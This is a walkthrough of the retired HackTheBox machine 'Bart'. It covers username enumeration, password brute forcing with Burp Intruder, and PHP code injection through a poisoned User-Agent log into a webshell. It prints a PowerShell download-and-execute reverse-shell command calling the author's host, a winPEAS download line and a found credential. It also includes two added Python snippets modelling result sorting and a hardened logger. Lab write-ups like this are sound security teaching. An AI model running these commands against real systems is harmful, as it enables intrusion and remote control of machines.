HacktheBox - Bart - Retired
Recon
I've been using threader3000 for a while to do my initial scanning on HTB. I've recently started using a variant of it that can automatically run the nmap scan on the open ports it finds.
Only port 80 is open.
It is an IIS server, and it also shows a redirect to http://forum.bart.htb. Since it is IIS we can pretty safely assume this is a Windows box.
Let's check it out.
Nothing…
This might just be a DNS resolution issue. Let's add forum.bart.htb to our /etc/hosts to see if that fixes it.
We can use vi to add the entry:
10.10.10.81 forum.bart.htb
Now let's try this again.
Not much to go on here, just a list of employee names (we will file that away for the future).
Let's run a directory brute force against the server and see if we can find anything interesting.
One of the results of the dirb attack is
Let's check that out.
A server monitor page, but it looks like it requires authentication.
Looks like this webapp is PHP Server Monitor v3.2.1
Let's google it and see what we can learn about it
We can try to look around for default logins and such… but I came up empty on that front.
Hey… There is a Forgot Password link there. I wonder what it does?
It asks for a username. Let's try with just test as the username.
OK, we found some employee names on the forum.bart.htb site. Let's try some of those names:
Samantha Brown
Daniel Simmons
Robert Hilton
These names are all listed in the Our Team section… But wait, there's more.
In the Latest News section there is a post about Daniella Lamborghini being a new employee, so let's make sure we include that name too.
I ran CeWL against the site too, to see if I might have missed any names.
CeWL is a crawler that pulls all the words off a website for you and displays just the list of words. I sent my results to a text file to make it easier to look through.
Also, from the Employees section we can see that the company's email addresses take the form firstinitial.lastname@bart.htb, for example:
s.brown@bart.htb
So we can build out a quick list of what these employees' email addresses probably are:
s.brown@bart.htb
d.simmons@bart.htb
r.hilton@bart.htb
d.lamborghini@bart.htb
Let's try these as usernames in the Server Monitor forgot-password form, starting with Mr. Hilton since he is in charge of the tech according to the Meet the Team page.
Nada… Let's go back to our cewl output.
There is one more name showing up that I can't find anywhere on the site… Harvey
Let's search for it in the source code for the site.
Found him, commented out in the employees section. Looks like a developer who might no longer be with the company.
Harvey Potter… No comment.
So he would be h.potter@bart.htb… still not going to touch that name :)
Now if we try the forgot-password form with the username harvey we get this message back:
An email has been sent with password reset instructions. So the username Harvey is valid for this site.
Exploit
So now we can try to brute force Harvey's password using the cewl.txt we created earlier. Let's take a second and modify our cewl.txt so it has three versions of each word found: the original, all uppercase and all lowercase, just to make our lives a little easier. We can use translate to feed cewl.txt into a new file that converts it to these other forms and then combine the lists.
To convert it to all uppercase we use:
To convert to lowercase we simply swap the translation around:
Then we can append these two files to our original cewl.txt.
We can use Hydra to perform the attack, but first let's start up Burp Suite to make sure we format our attack correctly.
Let's capture a bad login using Burp Suite.
Here we can start extracting what is needed for our hydra attack:
User_name=harvey
User_password=test
action=login
Since this site uses cookies we will need to add the cookie to our hydra command as well, or it will not work correctly (it will actually report every word as a valid password; I learned this the hard way :) )
This takes a while, so let's up the number of threads hydra uses to 50.
We just need to add the switch -t 50.
We also need to know what is displayed on a failed login, so hydra knows what to filter on:
The information is incorrect
So our final hydra command should be:
OMG… this was taking forever, so I switched tactics and went with an Intruder sniper attack in Burp.
Let's go back to Burp and send our failed request over to Intruder.
Once we click on the Positions tab we can see that Burp tried to determine the attack points for us and highlighted a bunch of fields in the POST request.
So let's hit Clear to get back to nothing selected.
Now we highlight just the password value, since that is the only thing we want Intruder to change, and select Add §.
Now only the password is selected for our attack, so we go over to the Payloads tab and load our cewl list.
Now, in the paid version of Burp you can load the payloads from a file, but I'm using the Community Edition, so I have to highlight all the words in my list, copy them and then use the Paste function here to load the list.
And now our attack is ready. You can see our payload list loaded up now.
Let's click on Start Attack
Now we see the requests along with their response codes and response lengths.
Now we wait until it iterates over our payload list.
What we are looking for here is a difference in either the status or the length.
For every wrong password tried, it should essentially return the same error, which should be the same length. So we can look for results that aren't 3926 in length.
After our attack has run (and it took a very long time… like hours for me)
we sort by status code to see if there is anything other than 200 (which simply means OK).
Here we can see a status code of 302 (a redirect) for the password potter, so this might be the password we are looking for.
Let's try to log in with Harvey:potter.
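As an added example (not part of the original write-up), here is the same sorting logic in Python: it takes a constructed list of Intruder-style rows, treats the most common (status, length) pair as the failed-login baseline, and reports every row that deviates from it. Only the 200/3926 baseline and the 302 for potter come from the text; every other row and the redirect's length are made up.

```python
from collections import Counter

# Constructed sample of Intruder results as (payload, status, length).
# The 200/3926 baseline and the 302 for "potter" follow the write-up above;
# every other row, and the 302 response length, is made up for this example.
SAMPLE_RESULTS = [
    ("Bart", 200, 3926),
    ("Samantha", 200, 3926),
    ("Hilton", 200, 3926),
    ("harvey", 200, 3926),
    ("Potter", 200, 3926),
    ("potter", 302, 420),     # redirect: different status and length
    ("Daniella", 200, 3940),  # same status, slightly different length
]


def baseline(results):
    """The most common (status, length) pair is what a failed login looks like."""
    pairs = Counter((status, length) for _, status, length in results)
    return pairs.most_common(1)[0][0]


def find_outliers(results, length_tolerance=0):
    """Return (payload, reasons) for each row that deviates from the baseline.

    Rows that differ in both status and length are listed first, since they are
    the strongest candidates; length_tolerance ignores small size jitter such as
    a timestamp or CSRF token that changes on every error page.
    """
    base_status, base_length = baseline(results)
    hits = []
    for payload, status, length in results:
        reasons = []
        if status != base_status:
            reasons.append(f"status {status} != {base_status}")
        if abs(length - base_length) > length_tolerance:
            reasons.append(f"length {length} != {base_length}")
        if reasons:
            hits.append((payload, reasons))
    hits.sort(key=lambda hit: -len(hit[1]))
    return hits


if __name__ == "__main__":
    for payload, reasons in find_outliers(SAMPLE_RESULTS, length_tolerance=20):
        print(payload, "->", "; ".join(reasons))
```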
Winner winner chicken dinner!!
Let's poke around in here and see what else we might find.
We can see a new subdomain here.
Internal-01.bart.htb
Let's add that to our hosts file and see what we might find there.
We got another login screen. Oi.
The same user/pass we used for the Server Monitor doesn't work here; the password is not long enough (it says we need 8 characters).
Let's throw dirb at this new domain and see if we can find anything else interesting being served here.
Let's see if this is some sort of common chat program: just grab the last part of the URL,
simple_chat/Login_form.php, and pop it into Google.
Looks like it might be an AJAX chat that is on GitHub:
https://github.com/magkopian/php-ajax-simple-chat/blob/master/README.md
It looks like there should be a registration page.
Let's see if we can verify this is the right thing.
If we run gobuster against it:
Looks like the directory structure matches pretty well.
Let's try to bring up the registration page to see if we can create a new user.
Well that's a wrench….
But wait, it looks like it did redirect us to register_form.php, so we might still be on the right path.
If we look at the code for register_form.php:
https://github.com/magkopian/php-ajax-simple-chat/blob/master/simple_chat/register_form.php
Here in the code it looks like it just needs two inputs: one named uname (which we can assume is the username) and another named passwd (which we can assume is the password).
So what if we just send those two fields in a POST to register.php; can we still add a new user?
Let's try to send a POST request using curl. We just need the -d switch to supply the two fields we want to send.
https://www.educative.io/edpresso/how-to-perform-a-post-request-using-curl
Now we can try to log in with these new credentials:
circusmonkey
test1234
We are in… Not much here though. Let's poke around.
We can enter text and it shows up in the chat window.
There are Refresh and Log links in the top right; let's check out the source code.
Clicking on the Log button
we get these messages:
Let's see what happens when we go to the link in the code:
We see the same 1 we saw in the alert box.
Looks like there are a couple of values we can mess with here… filename and username.
What happens if we change filename to the actual log.php itself?
If we circle back to the txt file we can see it added our User-Agent to the log file.
So now we have another thing we can fuss with…
The User-Agent.
Let's capture this in Burp and edit our User-Agent.
I'm just going to set it to "Testy McTestFace".
The response says OK, and if we look at the txt file again we can see it put what we wanted in there.
So we can write whatever we want to this text file… This is PHP, so what if we send it some PHP?
Let's start with Hello world.
The PHP code for that is:
And we can put that in our User-Agent.
And we see this in the output.
Looks like we can use this to execute PHP.
Let's try to ping out to our Kali box.
Let's make the User-Agent:
Before we send this GET request, let's set up tcpdump to alert us to ICMP traffic on our HackTheBox VPN interface.
-i specifies which interface to listen on, in this case our VPN tunnel.
-n: we can filter the traffic so it doesn't show us everything; we chose to filter for just ICMP (ping).
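As an added example (not the chat project's code), here is a Python model of the log endpoint described above: the vulnerable version trusts the filename parameter and appends the raw User-Agent, while the hardened version pins the file to a plain .txt name inside the log directory and escapes what it writes. The endpoint shape, the .txt-only rule and the demo() helper are assumptions made for this illustration.

```python
import html
import os
import re
import tempfile

# Assumption for this model: chat logs are plain .txt files in one directory.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.txt")


def vulnerable_log(log_dir, filename, username, user_agent):
    """Models the behaviour seen above: the caller picks the file name and the
    raw User-Agent is appended, so filename=log.php plus a PHP User-Agent
    leaves an executable PHP file under the web root."""
    path = os.path.join(log_dir, filename)
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(f"{username} {user_agent}\n")
    return path


def hardened_log(log_dir, filename, username, user_agent):
    """Only a plain .txt name inside log_dir is accepted (this removes the PHP
    execution path); both fields are HTML-escaped and length-capped so the log
    is also safe to render back into the chat page."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError("log file must be a plain .txt name")
    path = os.path.join(log_dir, filename)
    if os.path.dirname(os.path.realpath(path)) != os.path.realpath(log_dir):
        raise ValueError("log file must stay inside the log directory")
    line = f"{html.escape(username)[:64]} {html.escape(user_agent)[:256]}\n"
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(line)
    return path


def demo():
    """Run both versions against the write-up's Hello world probe in a temp dir."""
    ua = "<?php echo 'Hello world'; ?>"  # the probe the text sends as User-Agent
    log_dir = tempfile.mkdtemp()
    vuln_path = vulnerable_log(log_dir, "log.php", "circusmonkey", ua)
    try:
        hardened_log(log_dir, "log.php", "circusmonkey", ua)
        rejected = False
    except ValueError:
        rejected = True
    safe_path = hardened_log(log_dir, "log.txt", "circusmonkey", ua)
    with open(vuln_path, encoding="utf-8") as vf, open(safe_path, encoding="utf-8") as sf:
        vuln_text, safe_text = vf.read(), sf.read()
    return {
        "vulnerable_wrote_php_file": vuln_path.endswith(".php") and "<?php" in vuln_text,
        "hardened_rejected_php_name": rejected,
        "hardened_escaped_payload": "<?php" not in safe_text and "&lt;?php" in safe_text,
    }
```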
Now we can send our request.
And here we can see the pings coming in from the server.
Now what?
Now we need to pop our shell.
For grins and giggles I tried changing the name log.php to log99.php in my request to see if we could write new files.
Turns out we can, and the code execution still works.
If you are unfamiliar with PHP webshells, this is a great resource, and it is where I got my code for the next part:
https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/
So we can write our own php file to the server.
Let's use this to create PHP that will accept an argument called cmd.
Let's change our User-Agent to:
After we send this GET we can start passing commands to the system using the cmd variable we created.
Let's start simple and pass dir, since this is a Windows box, to make sure it's working.
And we got our directory listing back!
So we can send system commands using the variable we injected.
That's cool and all but what about a real shell?
We can try a number of things, like putting netcat on here or sending over the nishang reverse shell script… our options are almost limitless.
https://bad-jubies.github.io/RCE-NOW-WHAT/
This blog walks us through using our new cmd variable with PHP to download and invoke nishang's Invoke-PowerShellTcp.ps1.
I'm going to deviate slightly from the blog post. Instead of stringing together two PowerShell commands to download and then execute the reverse shell, let's modify the PS1 script to include the invocation at the end, so it executes itself with the correct settings once it's downloaded.
To do this we simply edit the Invoke-PowerShellTcp.ps1 script and add the invocation at the end of the script.
This is my VPN IP as well as the port I want the reverse shell to come in on. I saved this to my /bart folder.
Just a couple more steps before we can test this out.
We need a way to serve this PS1 file to Bart, we need to set up our listener to catch our reverse shell, and we need to encode our payload so it reaches Bart the right way.
First, let's use updog to serve the file up. It defaults to port 9090.
OK, next our listener.
Now we need to format our command. The final command we want to run is:
powershell.exe -ExecutionPolicy bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12:9090/Invoke-PowerShellTcp.ps1')
But we will need to URL-encode this so it keeps all our formatting.
We can use Burp's built-in convert function to handle this for us.
Now we should just need to hit Send and hopefully catch our shell.
Woot!
We got our shell; now we need to figure out how to escalate our privileges from iusr.
It's always a good idea to poke around in the directory you land in, as well as the directories around it; you might find creds in configuration files.
Just like C:\inetpub\wwwroot\monitr\config.php
Looks like daniels password for this application is ?St4r1ng1sCr33py?
Maybe that will help us down the road
Type
It just so happens those are the same creds he uses to log in to the monitor.bart.htb site.
We can continue to poke around, but no obvious path forward is revealing itself.
Let's run winPEAS on this to see if it can help us find a path.
First we need to copy winPEAS.exe to the folder we are serving with updog.
If you don't have it, grab a copy from their GitHub:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
Then we can use PowerShell to download it to a temp directory (which doesn't exist, so we need to make it first: mkdir C:\temp).
Invoke-WebRequest -Uri "http://10.10.14.12:9090/winPEAS.exe" -OutFile "C:\temp\winPEAS.exe"
Then we can execute C:\temp\winPEAS.exe.
Once it's done executing, this bit really grabs my attention:
Auto login is present for the administrator account, with their password!
Now if this were Linux we could just su and switch over to the administrator account.
I found this blog that looks like it fits perfectly for what we want to do:
https://davidhamann.de/2019/12/08/running-command-different-user-powershell/
We will need to modify this a bit to use the credentials we found. I also want it to spawn a new reverse shell back to my Kali box so we have full command execution.